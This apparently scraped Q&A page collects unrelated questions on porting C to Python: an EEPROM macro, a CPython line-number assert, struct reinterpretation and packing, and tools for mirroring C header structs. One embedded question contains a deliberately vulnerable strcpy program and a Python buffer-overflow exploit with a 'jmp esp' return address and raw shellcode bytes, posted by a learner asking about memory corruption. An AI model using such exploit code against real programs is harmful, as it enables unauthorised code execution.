I'm trying to rewrite C code to python, but I'm not sure how to express this part in python
#include <EEPROM.h>
#define EEPROM_write(address, p) {int i = 0; byte *pp = (byte*)&(p);for(; i < sizeof(p); i++) EEPROM.write(address+i, pp[i]);}
I think I should use I2C object from machine, but I'm not sure what is going on in the C version
Let's dissect the macro line:
#define
This is the preprocessor command to define a macro.
EEPROM_write(address, p)
The macro is named "EEPROM_write" and it takes two arguments, "address" and "p". Since the preprocessor is mostly working here as a search-and-replace mechanism, there are no types. They depend on the site where the macro is used.
{
int i = 0;
byte *pp = (byte*)&(p);
for (; i < sizeof(p); i++)
EEPROM.write(address+i, pp[i]);
}
This is the formatted C code of the replacement. It consist of a single block of statements, and the preprocessor will replace each occurence of address and p with the arguments given at the usage of the macro.
The code block takes the address of p as a byte pointer. Then it loops through all bytes of p (including padding) and calls EEPROM.write() with consecutive addresses (starting at address) and the respective byte of p.
Related
testing on ../../test/test_patm.py
python: Python/compile.c:4420: int assemble_lnotab(struct assembler *,
struct instr *): Assertion `d_lineno >= 0' failed.
Aborted
When running my test programs I got an error as given above.
Finally I found it was just quite few differences between the source codes of Python3.5 and Python3.6.
Just one line:
Python3.5
static int
assemble_lnotab(struct assembler *a, struct instr *i)
{
int d_bytecode, d_lineno;
Py_ssize_t len;
unsigned char *lnotab;
d_bytecode = a->a_offset - a->a_lineno_off;
d_lineno = i->i_lineno - a->a_lineno;
assert(d_bytecode >= 0);
assert(d_lineno >= 0); // the only difference
if(d_bytecode == 0 && d_lineno == 0)
return 1;
...
Python 3.6
static int
assemble_lnotab(struct assembler *a, struct instr *i)
{
int d_bytecode, d_lineno;
Py_ssize_t len;
unsigned char *lnotab;
d_bytecode = (a->a_offset - a->a_lineno_off) * sizeof(_Py_CODEUNIT);
d_lineno = i->i_lineno - a->a_lineno;
assert(d_bytecode >= 0);
if(d_bytecode == 0 && d_lineno == 0)
return 1;
What if I just deleted assert(d_lineno >= 0);?
You're using a debug build of 3.5. In Python 3.5 and any previous version, the line numbering within a single bytecode block (i.e. the bytecode of a module, or a function) had to be monotonic, that is each opcode had to map to a line in source code whose linenumber must be greater than or equal to the line number of the previous opcode. This was ever checked in debug builds; in release builds of Python the assert would not be compiled in, but the generated line number tab would have been invalid anyway.
This was discussed in Issue 26107 on bugs.python.org. The requirement of monotonicity of line numbers was seen detrimental to optimizations, many of which would reorganize the generated bytecode around. Thus the check was removed in 3.6 along with other changes that make the line number delta be a signed integer.
You can comment out this assert pretty safely, as release builds would have eliminated it anyhow, but don't expect debugging to work correctly in the generated code as the line number tab is now invalid.
As an alternative, if you're reorganizing lines in the AST, or something similar, you can set all line numbers to 0 - not just the missing ones; or you can generate fake line numbers that don't break the monotonicity rule.
A coincidental problem occurred with generated ASTs, as the ast.fix_missing_locations would write the line number of 0 to any nodes that lacked line numbering. If parts of the AST contain line numbers because they originated from ast.parse, it will be likely that the resulting AST tree would break the monotonicity requirement - which again would only lead to problems on non-release builds of Pythons < 3.6.
The other change, that is not relevant to the bug here, is the change from bytecode to wordcode, which also was introduced in Python 3.6. Here each opcode would be a 16-bit word instead of a 8-bit byte with possible extended args. That's the reason for the offset being multiplied by sizeof(_Py_CODEUNIT);.
Say I have the following code in C++:
union {
int32_t i;
uint32_t ui;
};
i = SomeFunc();
std::string test(std::to_string(ui));
std::ofstream outFile(test);
And say I had the value of i somehow in Python, how would I be able to get the name of the file?
For those of you that are unfamiliar with C++. What I am doing here is writing some value in signed 32-bit integer format to i and then interpreting the bitwise representation as an unsigned 32-bit integer in ui. I am taking the same 32 bits and interpreting them in two different ways.
How can I do this in Python? There does not seem to be any explicit type specification in Python, so how can I reinterpret some set of bits in a different way?
EDIT: I am using Python 2.7.12
I would use python struct for interpreting bits in different ways.
something like following to print -12 as unsigned integer
import struct
p = struct.pack("#i", -12)
print("{}".format(struct.unpack("#I",p)[0]))
I try write my own exploit. The idea is simple - overwrite return address to place where is opcode 'jmp esp'. In esp is address of my shellcode.
So I have this simple program:
#include <stdio.h>
#include <string.h>
void do_something(char *Buffer)
{
char MyVar[100];
strcpy(MyVar,Buffer);
}
int main (int argc, char **argv)
{
do_something(argv[1]);
return 0;
}
My exploit have been written in python. Code: (I think that my shellcode not work, but it is not important now)
import os
import subprocess
out = '\x48' * 112
out = out + <address of 'jmp esp' opcode>
out = out + '\xcc\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x36\x8B\x06\x8B\x68 \x08\xEB\x20\x5B\x53\x55\x5B\x81\xEB\x11\x11\x11\x11\x81\xC3\xDA\x3F\x1A\x11\xFF\xD3\x81\xC3\x11\x11\x11\x11\x81\xEB\x8C\xCC\x18\x11\xFF\xD3\xE8\xDB\xFF\xFF\xFF\x63\x6d\x64'
subprocess.call(['SimpleExploit.exe', out])
If address of 'jmp esp' opcode I have set for 0x41414141: (AAAA)
everything is ok (of course 0x41414141 is not good address, but I can see that memory has been overwritten)
My problem starts if I put correctly address. I found 0x7769E24D, so I used this value and after that in ollydbg I seen:
And this is my question: Why memory looks different? It looks like that one line has been removed. But why? Interesting thing is that If I change only one byte (0x77 to 0x41), memory is overwrite with correct value.
The second problem is that some of my bytes are transform to different values - for example 0x8b to 0x3f.
Could somebody tell me why this happen? Maybe this is a kind of protection? It is something with my operation system? I use Windows 8.1 x64.
Is there a way in python to unpack C structures created using #pragma pack(x) or __attribute__((packed)) using structs?
Alternatively, how to determine the manner in which python struct handles padding?
Use the struct class.
It is flexible in terms of byte order (big vs. little endian) and alignment (packing). See Byte Order, Size, and Alignment. It defaults to native byte order (pretty much meaning however python was compiled).
Native example
C:
struct foo {
int bar;
char t;
char x;
}
Python:
struct.pack('IBB', bar, t, x)
I often have to write code in other languages that interact with C structs. Most typically this involves writing Python code with the struct or ctypes modules.
So I'll have a .h file full of struct definitions, and I have to manually read through them and duplicate those definitions in my Python code. This is time consuming and error-prone, and it's difficult to keep the two definitions in sync when they change frequently.
Is there some tool or library in any language (doesn't have to be C or Python) which can take a .h file and produce a structured list of its structs and their fields? I'd love to be able to write a script to generate my automatically generate my struct definitions in Python, and I don't want to have to process arbitrary C code to do it. Regular expressions would work great about 90% of the time and then cause endless headaches for the remaining 10%.
If you compile your C code with debugging (-g), pahole (git) can give you the exact structure layouts being used.
$ pahole /bin/dd
…
struct option {
const char * name; /* 0 8 */
int has_arg; /* 8 4 */
/* XXX 4 bytes hole, try to pack */
int * flag; /* 16 8 */
int val; /* 24 4 */
/* size: 32, cachelines: 1, members: 4 */
/* sum members: 24, holes: 1, sum holes: 4 */
/* padding: 4 */
/* last cacheline: 32 bytes */
};
…
This should be quite a lot nicer to parse than straight C.
Regular expressions would work great about 90% of the time and then cause endless headaches for the remaining 10%.
The headaches happen in the cases where the C code contains syntax that you didn't think of when writing your regular expressions. Then you go back and realise that C can't really be parsed by regular expressions, and life becomes not fun.
Try turning it around: define your own simple format, which allows less tricks than C does, and generate both the C header file and the Python interface code from your file:
define socketopts
int16 port
int32 ipv4address
int32 flags
Then you can easily write some Python to convert this to:
typedef struct {
short port;
int ipv4address;
int flags;
} socketopts;
and also to emit a Python class which uses struct to pack/unpack three values (possibly two of them big-endian and the other native-endian, up to you).
Have a look at Swig or SIP that would generate interface code for you or use ctypes.
Have you looked at Swig?
I have quite successfully used GCCXML on fairly large projects. You get an XML representation of the C code (including structures) which you can post-process with some simple Python.
ctypes-codegen or ctypeslib (same thing, I think) will generate ctypes Structure definitions (also other things, I believe, but I only tried structs) by parsing header files using GCCXML. It's no longer supported, but will likely work in some cases.
One my friend for this tasks done C-parser which he use with cog.